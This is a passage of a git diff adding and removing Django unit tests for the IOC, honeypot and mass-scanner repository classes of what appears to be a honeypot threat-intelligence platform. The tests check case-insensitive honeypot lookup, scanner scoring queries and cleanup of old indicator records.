+    def test_is_enabled_returns_true_for_cowrie(self):
+        result = self.repo.is_enabled("Cowrie")
+        self.assertTrue(result)
+
+    def test_is_enabled_returns_true_for_log4pot(self):
+        result = self.repo.is_enabled("Log4pot")
+        self.assertTrue(result)
+
+    def test_is_enabled_returns_true_for_active_honeypot(self):
+        result = self.repo.is_enabled("Heralding")
+        self.assertTrue(result)
+
+    def test_is_enabled_returns_false_for_inactive_honeypot(self):
+        result = self.repo.is_enabled("Ddospot")
+        self.assertFalse(result)
+
+    def test_add_honeypot_to_ioc_adds_new_honeypot(self):
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+        honeypot = GeneralHoneypot.objects.create(name="TestPot", active=True)
+        result = self.repo.add_honeypot_to_ioc("TestPot", ioc)
+        self.assertIn(honeypot, result.general_honeypot.all())
+
+    def test_add_honeypot_to_ioc_idempotent(self):
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+        honeypot = GeneralHoneypot.objects.create(name="TestPot", active=True)
+        ioc.general_honeypot.add(honeypot)
+        initial_count = ioc.general_honeypot.count()
+        result = self.repo.add_honeypot_to_ioc("TestPot", ioc)
+        self.assertEqual(result.general_honeypot.count(), initial_count)
+        self.assertEqual(ioc.general_honeypot.count(), 1)
+
+    def test_add_honeypot_to_ioc_multiple_honeypots(self):
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+        hp1 = GeneralHoneypot.objects.create(name="Pot1", active=True)
+        hp2 = GeneralHoneypot.objects.create(name="Pot2", active=True)
+        self.repo.add_honeypot_to_ioc("Pot1", ioc)
+        self.repo.add_honeypot_to_ioc("Pot2", ioc)
+        self.assertEqual(ioc.general_honeypot.count(), 2)
+        self.assertIn(hp1, ioc.general_honeypot.all())
+        self.assertIn(hp2, ioc.general_honeypot.all())
+
+    def test_existing_honeypots(self):
+        expected_honeypots = ["Cowrie", "Log4pot", "Heralding", "Ciscoasa", "Ddospot"]
+        for hp_name in expected_honeypots:
+            self.assertIn(self.repo._normalize_name(hp_name), self.repo._honeypot_cache)
+
+    def test_is_ready_for_extraction_creates_and_enables(self):
+        result = self.repo.is_ready_for_extraction("FooPot")
+        self.assertTrue(result)
+        self.assertTrue(GeneralHoneypot.objects.filter(name="FooPot").exists())
+
+    def test_is_ready_for_extraction_case_insensitive(self):
+        GeneralHoneypot.objects.create(name="Cowrie", active=True)
+        result = self.repo.is_ready_for_extraction("cowrie")
+        self.assertTrue(result)
+        self.assertEqual(GeneralHoneypot.objects.filter(name__iexact="cowrie").count(), 1)
+
+    def test_get_hp_by_name_insensitive(self):
+        GeneralHoneypot.objects.create(name="Cowrie", active=True)
+        result = self.repo.get_hp_by_name("cowrie")
+        self.assertIsNotNone(result)
+
+    def test_disabled_honeypot_case_insensitive(self):
+        GeneralHoneypot.objects.create(name="Testpot69", active=False)
+
+        # reiniting repo after DB change to refresh the cache
+        repo = IocRepository()
+        result = repo.is_ready_for_extraction("testpot69")
+        self.assertFalse(result)
+
+    def test_special_and_normal_honeypots(self):
+        GeneralHoneypot.objects.create(name="NormalPot", active=False)
+
+        repo = IocRepository()
+
+        self.assertTrue(repo.is_ready_for_extraction("cowrie"))
+        self.assertTrue(repo.is_ready_for_extraction("Log4Pot"))
+        self.assertFalse(repo.is_ready_for_extraction("NormalPot"))
+        self.assertFalse(repo.is_ready_for_extraction("normalpot"))
+
+    def test_create_honeypot_case_insensitive_uniqueness(self):
+        initial_count = GeneralHoneypot.objects.count()
+        GeneralHoneypot.objects.create(name="TestPot123", active=True)
+        self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
+
+        with self.assertRaises(IntegrityError):
+            with transaction.atomic():
+                GeneralHoneypot.objects.create(name="testpot123", active=True)
+
+        self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
+        self.assertEqual(GeneralHoneypot.objects.get(name__iexact="testpot123").name, "TestPot123")
+
+    def test_create_honeypot_integrity_error_handling(self):
+        initial_count = GeneralHoneypot.objects.count()
+        GeneralHoneypot.objects.create(name="Log4PotTest123", active=True)
+
+        try:
+            with transaction.atomic():
+                GeneralHoneypot.objects.create(name="log4pottest123", active=True)
+        except IntegrityError:
+            hp = GeneralHoneypot.objects.filter(name__iexact="log4pottest123").first()
+
+        self.assertEqual(hp.name, "Log4PotTest123")
+        self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
+
+    def test_create_new_honeypot_creates_and_updates_cache(self):
+        self.repo._honeypot_cache.clear()
+        hp = self.repo.create_honeypot("UniqueNewPot123")
+        self.assertEqual(hp.name, "UniqueNewPot123")
+        self.assertIn("uniquenewpot123", self.repo._honeypot_cache)
+        self.assertTrue(hp.active)
+
+        db_hp = GeneralHoneypot.objects.get(name="UniqueNewPot123")
+        self.assertEqual(db_hp.name, "UniqueNewPot123")
+        self.assertTrue(db_hp.active)
+
+    def test_honeypot_unique_constraint_case_insensitive(self):
+        initial_count = GeneralHoneypot.objects.count()
+        hp1 = self.repo.create_honeypot("TestPot456")
+        self.assertIsNotNone(hp1)
+
+        with self.assertRaises(IntegrityError):
+            with transaction.atomic():
+                GeneralHoneypot.objects.create(name="testpot456", active=True)
+
+        self.assertEqual(GeneralHoneypot.objects.filter(name__iexact="testpot456").count(), 1)
+        self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
+
+    def test_get_scanners_for_scoring_returns_scanners(self):
+        # Create scanners
+        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True)
+        IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, log4j=True)
+
+        result = self.repo.get_scanners_for_scoring(["recurrence_probability", "expected_interactions"])
+
+        names = [ioc.name for ioc in result]
+        self.assertIn("1.2.3.4", names)
+        self.assertIn("5.6.7.8", names)
+
+    def test_get_scanners_for_scoring_excludes_non_scanners(self):
+        IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, cowrie=True)
+
+        result = self.repo.get_scanners_for_scoring(["recurrence_probability"])
+
+        names = [ioc.name for ioc in result]
+        self.assertNotIn("1.2.3.4", names)
+
+    def test_get_scanners_for_scoring_only_loads_specified_fields(self):
+        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, attack_count=100)
+
+        result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
+
+        # Check that our created IOC is in the results
+        names = [ioc.name for ioc in result]
+        self.assertIn("1.2.3.4", names)
+        # Verify name field is accessible (field was loaded)
+        test_ioc = next(ioc for ioc in result if ioc.name == "1.2.3.4")
+        self.assertEqual(test_ioc.name, "1.2.3.4")
+
+    def test_get_scanners_by_pks_returns_correct_iocs(self):
+        ioc1 = IOC.objects.create(name="1.2.3.4", type="ip")
+        ioc2 = IOC.objects.create(name="5.6.7.8", type="ip")
+        IOC.objects.create(name="9.10.11.12", type="ip")  # Should not be returned
+
+        result = list(self.repo.get_scanners_by_pks({ioc1.pk, ioc2.pk}))
+
+        self.assertEqual(len(result), 2)
+        values = [r["value"] for r in result]
+        self.assertIn("1.2.3.4", values)
+        self.assertIn("5.6.7.8", values)
+        self.assertNotIn("9.10.11.12", values)
+
+    def test_get_scanners_by_pks_includes_honeypot_annotation(self):
+        hp = GeneralHoneypot.objects.create(name="TestPot", active=True)
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+        ioc.general_honeypot.add(hp)
+
+        result = list(self.repo.get_scanners_by_pks({ioc.pk}))
+
+        self.assertEqual(len(result), 1)
+        self.assertIn("honeypots", result[0])
+
+    def test_get_recent_scanners_returns_recent_only(self):
+        recent_date = datetime.now() - timedelta(days=5)
+        old_date = datetime.now() - timedelta(days=40)
+
+        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=recent_date)
+        IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, cowrie=True, last_seen=old_date)
+
+        cutoff = datetime.now() - timedelta(days=30)
+        result = list(self.repo.get_recent_scanners(cutoff, days_lookback=30))
+
+        values = [r["value"] for r in result]
+        self.assertIn("1.2.3.4", values)
+        self.assertNotIn("5.6.7.8", values)
+
+    def test_get_recent_scanners_excludes_non_scanners(self):
+        recent_date = datetime.now() - timedelta(days=5)
+        IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, cowrie=True, last_seen=recent_date)
+
+        cutoff = datetime.now() - timedelta(days=30)
+        result = list(self.repo.get_recent_scanners(cutoff))
+
+        values = [r["value"] for r in result]
+        self.assertNotIn("1.2.3.4", values)
+
+    def test_bulk_update_scores_updates_multiple_iocs(self):
+        ioc1 = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0)
+        ioc2 = IOC.objects.create(name="5.6.7.8", type="ip", recurrence_probability=0.0)
+
+        ioc1.recurrence_probability = 0.75
+        ioc2.recurrence_probability = 0.85
+
+        result = self.repo.bulk_update_scores([ioc1, ioc2], ["recurrence_probability"])
+
+        self.assertEqual(result, 2)
+        updated1 = IOC.objects.get(name="1.2.3.4")
+        updated2 = IOC.objects.get(name="5.6.7.8")
+        self.assertEqual(updated1.recurrence_probability, 0.75)
+        self.assertEqual(updated2.recurrence_probability, 0.85)
+
+    def test_bulk_update_scores_returns_zero_for_empty_list(self):
+        result = self.repo.bulk_update_scores([], ["recurrence_probability"])
+        self.assertEqual(result, 0)
+
+    def test_bulk_update_scores_updates_multiple_fields(self):
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0, expected_interactions=0.0)
+
+        ioc.recurrence_probability = 0.75
+        ioc.expected_interactions = 10.5
+
+        result = self.repo.bulk_update_scores([ioc], ["recurrence_probability", "expected_interactions"])
+
+        self.assertEqual(result, 1)
+        updated = IOC.objects.get(name="1.2.3.4")
+        self.assertEqual(updated.recurrence_probability, 0.75)
+        self.assertEqual(updated.expected_interactions, 10.5)
+
+    # Edge case tests
+    def test_get_scanners_for_scoring_returns_empty_when_no_scanners(self):
+        # Delete all existing scanners
+        IOC.objects.filter(scanner=True).delete()
+
+        result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
+
+        self.assertEqual(len(result), 0)
+
+    def test_get_scanners_for_scoring_excludes_inactive_honeypots(self):
+        hp = GeneralHoneypot.objects.create(name="InactivePot", active=False)
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True)
+        ioc.general_honeypot.add(hp)
+
+        result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
+
+        names = [ioc.name for ioc in result]
+        self.assertNotIn("1.2.3.4", names)
+
+    def test_get_scanners_for_scoring_with_multiple_honeypots(self):
+        hp1 = GeneralHoneypot.objects.create(name="Pot1", active=True)
+        hp2 = GeneralHoneypot.objects.create(name="Pot2", active=True)
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True)
+        ioc.general_honeypot.add(hp1, hp2)
+
+        result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
+
+        names = [ioc.name for ioc in result]
+        # Should appear only once despite multiple honeypots (distinct)
+        self.assertEqual(names.count("1.2.3.4"), 1)
+
+    def test_get_scanners_by_pks_with_empty_set(self):
+        result = list(self.repo.get_scanners_by_pks(set()))
+
+        self.assertEqual(len(result), 0)
+
+    def test_get_scanners_by_pks_with_nonexistent_pks(self):
+        result = list(self.repo.get_scanners_by_pks({99999, 99998}))
+
+        self.assertEqual(len(result), 0)
+
+    def test_get_scanners_by_pks_ioc_with_no_honeypots(self):
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+
+        result = list(self.repo.get_scanners_by_pks({ioc.pk}))
+
+        self.assertEqual(len(result), 1)
+        self.assertIn("honeypots", result[0])
+
+    def test_get_recent_scanners_all_iocs_older_than_cutoff(self):
+        old_date = datetime.now() - timedelta(days=40)
+        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=old_date)
+
+        cutoff = datetime.now() - timedelta(days=30)
+        result = list(self.repo.get_recent_scanners(cutoff))
+
+        values = [r["value"] for r in result]
+        self.assertNotIn("1.2.3.4", values)
+
+    def test_get_recent_scanners_with_inactive_honeypot(self):
+        hp = GeneralHoneypot.objects.create(name="InactivePot", active=False)
+        recent_date = datetime.now() - timedelta(days=5)
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, last_seen=recent_date)
+        ioc.general_honeypot.add(hp)
+
+        cutoff = datetime.now() - timedelta(days=30)
+        result = list(self.repo.get_recent_scanners(cutoff))
+
+        values = [r["value"] for r in result]
+        self.assertNotIn("1.2.3.4", values)
+
+    def test_bulk_update_scores_with_custom_batch_size(self):
+        ioc1 = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0)
+        ioc2 = IOC.objects.create(name="5.6.7.8", type="ip", recurrence_probability=0.0)
+
+        ioc1.recurrence_probability = 0.75
+        ioc2.recurrence_probability = 0.85
+
+        result = self.repo.bulk_update_scores([ioc1, ioc2], ["recurrence_probability"], batch_size=1)
+
+        self.assertEqual(result, 2)
+        updated1 = IOC.objects.get(name="1.2.3.4")
+        updated2 = IOC.objects.get(name="5.6.7.8")
+        self.assertEqual(updated1.recurrence_probability, 0.75)
+        self.assertEqual(updated2.recurrence_probability, 0.85)
+
+
+class TestScoringIntegration(CustomTestCase):
+    """Integration tests for scoring jobs using IocRepository."""
+
+    def setUp(self):
+        self.repo = IocRepository()
+
+    def test_update_scores_with_repository(self):
+        """Test UpdateScores class works with injected repository."""
+        import pandas as pd
+
+        from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
+
+        # Create test data
+        IOC.objects.create(name="10.1.2.3", type="ip", scanner=True, cowrie=True, recurrence_probability=0.0)
+        IOC.objects.create(name="10.5.6.7", type="ip", scanner=True, log4j=True, recurrence_probability=0.0)
+
+        # Create score dataframe
+        df = pd.DataFrame(
+            {
+                "value": ["10.1.2.3", "10.5.6.7"],
+                "recurrence_probability": [0.75, 0.85],
+                "expected_interactions": [10.0, 15.0],
+            }
+        )
+
+        # Inject repository and run update
+        job = UpdateScores(ioc_repo=self.repo)
+        result = job.update_db(df)
+
+        # Verify our IOCs were updated (may be more due to test fixtures)
+        self.assertGreaterEqual(result, 2)
+        updated1 = IOC.objects.get(name="10.1.2.3")
+        updated2 = IOC.objects.get(name="10.5.6.7")
+        self.assertEqual(updated1.recurrence_probability, 0.75)
+        self.assertEqual(updated2.recurrence_probability, 0.85)
+
+    def test_update_scores_resets_missing_iocs(self):
+        """Test UpdateScores resets scores for IOCs not in the dataframe."""
+        import pandas as pd
+
+        from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
+
+        # Create test data - one IOC will be missing from df
+        IOC.objects.create(name="10.2.3.4", type="ip", scanner=True, cowrie=True, recurrence_probability=0.9)
+        IOC.objects.create(name="10.6.7.8", type="ip", scanner=True, log4j=True, recurrence_probability=0.8)
+
+        # DataFrame only has one IOC
+        df = pd.DataFrame({"value": ["10.2.3.4"], "recurrence_probability": [0.75], "expected_interactions": [10.0]})
+
+        job = UpdateScores(ioc_repo=self.repo)
+        job.update_db(df)
+
+        # First should be updated, second should be reset to 0
+        updated1 = IOC.objects.get(name="10.2.3.4")
+        updated2 = IOC.objects.get(name="10.6.7.8")
+        self.assertEqual(updated1.recurrence_probability, 0.75)
+        self.assertEqual(updated2.recurrence_probability, 0.0)  # Reset
+
+    def test_get_current_data_with_repository(self):
+        """Test get_current_data utility function works with repository."""
+        from greedybear.cronjobs.scoring.utils import get_current_data
+
+        recent_date = datetime.now() - timedelta(days=5)
+        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=recent_date)
+
+        result = get_current_data(days_lookback=30, ioc_repo=self.repo)
+
+        self.assertIsInstance(result, list)
+        self.assertGreater(len(result), 0)
+        values = [r["value"] for r in result]
+        self.assertIn("1.2.3.4", values)
+
+    def test_get_data_by_pks_with_repository(self):
+        """Test get_data_by_pks utility function works with repository."""
+        from greedybear.cronjobs.scoring.utils import get_data_by_pks
+
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+
+        result = get_data_by_pks({ioc.pk}, ioc_repo=self.repo)
+
+        self.assertIsInstance(result, list)
+        self.assertEqual(len(result), 1)
+        self.assertEqual(result[0]["value"], "1.2.3.4")
+
+    def test_update_scores_with_mock_repository(self):
+        """Test UpdateScores can be fully mocked for unit testing."""
+        import pandas as pd
+
+        from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
+
+        # Create mock repository
+        mock_repo = Mock()
+        mock_ioc = Mock()
+        mock_ioc.name = "1.2.3.4"
+        mock_ioc.recurrence_probability = 0.0
+        mock_repo.get_scanners_for_scoring.return_value = [mock_ioc]
+        mock_repo.bulk_update_scores.return_value = 1
+
+        # Create score dataframe
+        df = pd.DataFrame({"value": ["1.2.3.4"], "recurrence_probability": [0.75], "expected_interactions": [10.0]})
+
+        # Inject mock and verify it's used
+        job = UpdateScores(ioc_repo=mock_repo)
+        result = job.update_db(df)
+
+        # Verify repository methods were called
+        mock_repo.get_scanners_for_scoring.assert_called_once()
+        mock_repo.bulk_update_scores.assert_called_once()
+        self.assertEqual(result, 1)
+
+
+class TestIocRepositoryCleanup(CustomTestCase):
+    """Tests for cleanup-related methods in IocRepository."""
+
+    def setUp(self):
+        self.repo = IocRepository()
+
+    def test_delete_old_iocs_deletes_old_records(self):
+        old_date = datetime.now() - timedelta(days=40)
+        recent_date = datetime.now() - timedelta(days=5)
+
+        IOC.objects.create(name="1.2.3.4", type="ip", last_seen=old_date)
+        IOC.objects.create(name="5.6.7.8", type="ip", last_seen=recent_date)
+
+        cutoff = datetime.now() - timedelta(days=30)
+        deleted_count = self.repo.delete_old_iocs(cutoff)
+
+        self.assertEqual(deleted_count, 1)
+        self.assertFalse(IOC.objects.filter(name="1.2.3.4").exists())
+        self.assertTrue(IOC.objects.filter(name="5.6.7.8").exists())
+
+    def test_delete_old_iocs_returns_zero_when_none_old(self):
+        recent_date = datetime.now() - timedelta(days=5)
+        IOC.objects.create(name="1.2.3.4", type="ip", last_seen=recent_date)
+
+        cutoff = datetime.now() - timedelta(days=30)
+        deleted_count = self.repo.delete_old_iocs(cutoff)
+
+        self.assertEqual(deleted_count, 0)
+
+    def test_update_ioc_reputation_updates_existing(self):
+        IOC.objects.create(name="1.2.3.4", type="ip", ip_reputation="")
+
+        result = self.repo.update_ioc_reputation("1.2.3.4", "mass scanner")
+
+        self.assertTrue(result)
+        updated = IOC.objects.get(name="1.2.3.4")
+        self.assertEqual(updated.ip_reputation, "mass scanner")
+
+    def test_update_ioc_reputation_returns_false_for_missing(self):
+        result = self.repo.update_ioc_reputation("9.9.9.9", "mass scanner")
+        self.assertFalse(result)
diff --git a/tests/test_mass_scanner_repository.py b/tests/test_mass_scanner_repository.py
new file mode 100644
index 00000000..22aeec7f
--- /dev/null
+++ b/tests/test_mass_scanner_repository.py
@@ -0,0 +1,37 @@
+from greedybear.cronjobs.repositories import MassScannerRepository
+from greedybear.models import MassScanner
+
+from . import CustomTestCase
+
+
+class TestMassScannerRepository(CustomTestCase):
+    """Tests for MassScannerRepository."""
+
+    def setUp(self):
+        self.repo = MassScannerRepository()
+
+    def test_get_or_create_creates_new_entry(self):
+        scanner, created = self.repo.get_or_create("1.2.3.4", "test scanner")
+
+        self.assertTrue(created)
+        self.assertEqual(scanner.ip_address, "1.2.3.4")
+        self.assertEqual(scanner.reason, "test scanner")
+        self.assertTrue(MassScanner.objects.filter(ip_address="1.2.3.4").exists())
+
+    def test_get_or_create_returns_existing(self):
+        MassScanner.objects.create(ip_address="5.6.7.8", reason="existing")
+
+        scanner, created = self.repo.get_or_create("5.6.7.8", "new reason")
+
+        self.assertFalse(created)
+        self.assertEqual(scanner.ip_address, "5.6.7.8")
+        # Should keep original reason, not update it
+        self.assertEqual(scanner.reason, "existing")
+        self.assertEqual(MassScanner.objects.filter(ip_address="5.6.7.8").count(), 1)
+
+    def test_get_or_create_without_reason(self):
+        scanner, created = self.repo.get_or_create("7.7.7.7")
+
+        self.assertTrue(created)
+        self.assertEqual(scanner.ip_address, "7.7.7.7")
+        self.assertEqual(scanner.reason, "")
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
deleted file mode 100644
index ff2647d0..00000000
--- a/tests/test_repositories.py
+++ /dev/null
@@ -1,1111 +0,0 @@
-from datetime import datetime
-from unittest.mock import Mock, patch
-
-from django.db import IntegrityError, transaction
-
-from greedybear.cronjobs.repositories import (
-    CowrieSessionRepository,
-    ElasticRepository,
-    FireHolRepository,
-    IocRepository,
-    MassScannerRepository,
-    SensorRepository,
-    get_time_window,
-)
-from greedybear.models import (
-    IOC,
-    CommandSequence,
-    CowrieSession,
-    FireHolList,
-    GeneralHoneypot,
-    MassScanner,
-    Sensor,
-)
-
-from . import CustomTestCase
-
-
-class TestIocRepository(CustomTestCase):
-    def setUp(self):
-        self.repo = IocRepository()
-
-    def test_get_ioc_by_name_returns_existing(self):
-        result = self.repo.get_ioc_by_name("140.246.171.141")
-        self.assertIsNotNone(result)
-        self.assertEqual(result.name, "140.246.171.141")
-
-    def test_get_ioc_by_name_returns_none_for_missing(self):
-        result = self.repo.get_ioc_by_name("8.8.8.8")
-        self.assertIsNone(result)
-
-    def test_save_creates_new_ioc(self):
-        ioc = IOC(name="1.2.3.4", type="ip")
-        result = self.repo.save(ioc)
-        self.assertIsNotNone(result.pk)
-        self.assertTrue(IOC.objects.filter(name="1.2.3.4").exists())
-
-    def test_save_updates_existing_ioc(self):
-        ioc = self.repo.get_ioc_by_name("140.246.171.141")
-        original_attack_count = ioc.attack_count
-
-        ioc.attack_count = 10
-        result = self.repo.save(ioc)
-        self.assertEqual(result.attack_count, 10)
-        self.assertEqual(IOC.objects.get(name="140.246.171.141").attack_count, 10)
-
-        ioc.attack_count = original_attack_count
-        result = self.repo.save(ioc)
-        self.assertEqual(result.attack_count, original_attack_count)
-        self.assertEqual(IOC.objects.get(name="140.246.171.141").attack_count, original_attack_count)
-
-    def test_create_honeypot(self):
-        self.repo.create_honeypot("NewHoneypot")
-        self.assertTrue(GeneralHoneypot.objects.filter(name="NewHoneypot").exists())
-        hp = GeneralHoneypot.objects.get(name="NewHoneypot")
-        self.assertTrue(hp.active)
-
-    def test_get_active_honeypots_returns_only_active(self):
-        GeneralHoneypot.objects.create(name="TestActivePot1", active=True)
-        GeneralHoneypot.objects.create(name="TestActivePot2", active=True)
-        GeneralHoneypot.objects.create(name="TestInactivePot", active=False)
-
-        result = self.repo.get_active_honeypots()
-        names = [hp.name for hp in result]
-
-        self.assertIn("TestActivePot1", names)
-        self.assertIn("TestActivePot2", names)
-        self.assertNotIn("TestInactivePot", names)
-
-    def test_get_active_honeypots_returns_empty_if_none_active(self):
-        GeneralHoneypot.objects.update(active=False)
-
-        result = self.repo.get_active_honeypots()
-        self.assertEqual(len(result), 0)
-
-        GeneralHoneypot.objects.update(active=True)
-
-    def test_get_hp_by_name_returns_existing(self):
-        GeneralHoneypot.objects.create(name="TestPot", active=True)
-        result = self.repo.get_hp_by_name("TestPot")
-        self.assertIsNotNone(result)
-        self.assertEqual(result.name, "TestPot")
-
-    def test_get_hp_by_name_returns_none_for_missing(self):
-        result = self.repo.get_hp_by_name("nonexistent")
-        self.assertIsNone(result)
-
-    def test_is_empty_returns_false_when_has_iocs(self):
-        result = self.repo.is_empty()
-        self.assertFalse(result)
-
-    def test_is_enabled_returns_true_for_cowrie(self):
-        result = self.repo.is_enabled("Cowrie")
-        self.assertTrue(result)
-
-    def test_is_enabled_returns_true_for_log4pot(self):
-        result = self.repo.is_enabled("Log4pot")
-        self.assertTrue(result)
-
-    def test_is_enabled_returns_true_for_active_honeypot(self):
-        result = self.repo.is_enabled("Heralding")
-        self.assertTrue(result)
-
-    def test_is_enabled_returns_false_for_inactive_honeypot(self):
-        result = self.repo.is_enabled("Ddospot")
-        self.assertFalse(result)
-
-    def test_add_honeypot_to_ioc_adds_new_honeypot(self):
-        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
-        honeypot = GeneralHoneypot.objects.create(name="TestPot", active=True)
-        result = self.repo.add_honeypot_to_ioc("TestPot", ioc)
-        self.assertIn(honeypot, result.general_honeypot.all())
-
-    def test_add_honeypot_to_ioc_idempotent(self):
-        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
-        honeypot = GeneralHoneypot.objects.create(name="TestPot", active=True)
-        ioc.general_honeypot.add(honeypot)
-        initial_count = ioc.general_honeypot.count()
-        result = self.repo.add_honeypot_to_ioc("TestPot", ioc)
-        self.assertEqual(result.general_honeypot.count(), initial_count)
-        self.assertEqual(ioc.general_honeypot.count(), 1)
-
-    def test_add_honeypot_to_ioc_multiple_honeypots(self):
-        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
-        hp1 = GeneralHoneypot.objects.create(name="Pot1", active=True)
-        hp2 = GeneralHoneypot.objects.create(name="Pot2", active=True)
-        self.repo.add_honeypot_to_ioc("Pot1", ioc)
-        self.repo.add_honeypot_to_ioc("Pot2", ioc)
-        self.assertEqual(ioc.general_honeypot.count(), 2)
-        self.assertIn(hp1, ioc.general_honeypot.all())
-        self.assertIn(hp2, ioc.general_honeypot.all())
-
-    def test_existing_honeypots(self):
-        expected_honeypots = ["Cowrie", "Log4pot", "Heralding", "Ciscoasa", "Ddospot"]
-        for hp_name in expected_honeypots:
-            self.assertIn(self.repo._normalize_name(hp_name), self.repo._honeypot_cache)
-
-    def test_is_ready_for_extraction_creates_and_enables(self):
-        result = self.repo.is_ready_for_extraction("FooPot")
-        self.assertTrue(result)
-        self.assertTrue(GeneralHoneypot.objects.filter(name="FooPot").exists())
-
-    def test_is_ready_for_extraction_case_insensitive(self):
-        GeneralHoneypot.objects.create(name="Cowrie", active=True)
-        result = self.repo.is_ready_for_extraction("cowrie")
-        self.assertTrue(result)
-        self.assertEqual(GeneralHoneypot.objects.filter(name__iexact="cowrie").count(), 1)
-
-    def test_get_hp_by_name_insensitive(self):
-        GeneralHoneypot.objects.create(name="Cowrie", active=True)
-        result = self.repo.get_hp_by_name("cowrie")
-        self.assertIsNotNone(result)
-
-    def test_disabled_honeypot_case_insensitive(self):
-        GeneralHoneypot.objects.create(name="Testpot69", active=False)
-
-        # reiniting repo after DB change to refresh the cache
-        repo = IocRepository()
-        result = repo.is_ready_for_extraction("testpot69")
-        self.assertFalse(result)
-
-    def test_special_and_normal_honeypots(self):
-        GeneralHoneypot.objects.create(name="NormalPot", active=False)
-
-        repo = IocRepository()
-
-        self.assertTrue(repo.is_ready_for_extraction("cowrie"))
-        self.assertTrue(repo.is_ready_for_extraction("Log4Pot"))
-        self.assertFalse(repo.is_ready_for_extraction("NormalPot"))
-        self.assertFalse(repo.is_ready_for_extraction("normalpot"))
-
-    def test_create_honeypot_case_insensitive_uniqueness(self):
-        initial_count = GeneralHoneypot.objects.count()
-        GeneralHoneypot.objects.create(name="TestPot123", active=True)
-        self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
-
-        with self.assertRaises(IntegrityError):
-            with transaction.atomic():
-                GeneralHoneypot.objects.create(name="testpot123", active=True)
-
-        self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
-        self.assertEqual(GeneralHoneypot.objects.get(name__iexact="testpot123").name, "TestPot123")
-
-    def test_create_honeypot_integrity_error_handling(self):
-        initial_count = GeneralHoneypot.objects.count()
-        GeneralHoneypot.objects.create(name="Log4PotTest123", active=True)
-
-        try:
-            with transaction.atomic():
-                GeneralHoneypot.objects.create(name="log4pottest123", active=True)
-        except IntegrityError:
-            hp = GeneralHoneypot.objects.filter(name__iexact="log4pottest123").first()
-
-        self.assertEqual(hp.name, "Log4PotTest123")
-        self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
-
-    def test_create_new_honeypot_creates_and_updates_cache(self):
-        self.repo._honeypot_cache.clear()
-        hp = self.repo.create_honeypot("UniqueNewPot123")
-        self.assertEqual(hp.name, "UniqueNewPot123")
-        self.assertTrue("uniquenewpot123" in self.repo._honeypot_cache)
-        self.assertTrue(hp.active)
-
-        db_hp = GeneralHoneypot.objects.get(name="UniqueNewPot123")
-        self.assertEqual(db_hp.name, "UniqueNewPot123")
-        self.assertTrue(db_hp.active)
-
-    def test_honeypot_unique_constraint_case_insensitive(self):
-        initial_count = GeneralHoneypot.objects.count()
-        hp1 = self.repo.create_honeypot("TestPot456")
-        self.assertIsNotNone(hp1)
-
-        with self.assertRaises(IntegrityError):
-            with transaction.atomic():
-                GeneralHoneypot.objects.create(name="testpot456", active=True)
-
-        self.assertEqual(GeneralHoneypot.objects.filter(name__iexact="testpot456").count(), 1)
-        self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
-
-    def test_get_scanners_for_scoring_returns_scanners(self):
-        # Create scanners
-        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True)
-        IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, log4j=True)
-
-        result = self.repo.get_scanners_for_scoring(["recurrence_probability", "expected_interactions"])
-
-        names = [ioc.name for ioc in result]
-        self.assertIn("1.2.3.4", names)
-        self.assertIn("5.6.7.8", names)
-
-    def test_get_scanners_for_scoring_excludes_non_scanners(self):
-        IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, cowrie=True)
-
-        result = self.repo.get_scanners_for_scoring(["recurrence_probability"])
-
-        names = [ioc.name for ioc in result]
-        self.assertNotIn("1.2.3.4", names)
-
-    def test_get_scanners_for_scoring_only_loads_specified_fields(self):
-        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, attack_count=100)
-
-        result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
-
-        # Check that our created IOC is in the results
-        names = [ioc.name for ioc in result]
-        self.assertIn("1.2.3.4", names)
-        # Verify name field is accessible (field was loaded)
-        test_ioc = next(ioc for ioc in result if ioc.name == "1.2.3.4")
